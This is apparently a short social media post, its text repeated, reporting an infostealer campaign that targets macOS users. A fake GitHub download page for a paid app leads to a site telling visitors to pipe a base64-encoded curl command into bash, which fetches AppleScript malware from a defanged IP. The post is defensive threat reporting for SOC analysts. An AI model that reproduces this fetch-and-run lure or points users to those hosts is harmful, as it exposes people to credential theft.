Nice, I've found an infostealer in the wild!
-
Nice, I've found an infostealer in the wild!
This repo just has some info and a download button for a paid macOS app.
It links to hxxps://za-loop-osx-software[.]github[.]io/.github/RoyalTSX, which redirects you to hxxps://github[.]topic-developer[.]com/packages.html, which tells you to run a
curlcommand and pipe it intobash, encoded in a base64 string.The curl command grabs a file from 217[.]119[.]139[.]117, which looks like an infostealer and some other malware written in AppleScript.
Have fun SOC people.
-
Nice, I've found an infostealer in the wild!
This repo just has some info and a download button for a paid macOS app.
It links to hxxps://za-loop-osx-software[.]github[.]io/.github/RoyalTSX, which redirects you to hxxps://github[.]topic-developer[.]com/packages.html, which tells you to run a
curlcommand and pipe it intobash, encoded in a base64 string.The curl command grabs a file from 217[.]119[.]139[.]117, which looks like an infostealer and some other malware written in AppleScript.
Have fun SOC people.
Clever bait, for an infostealer.
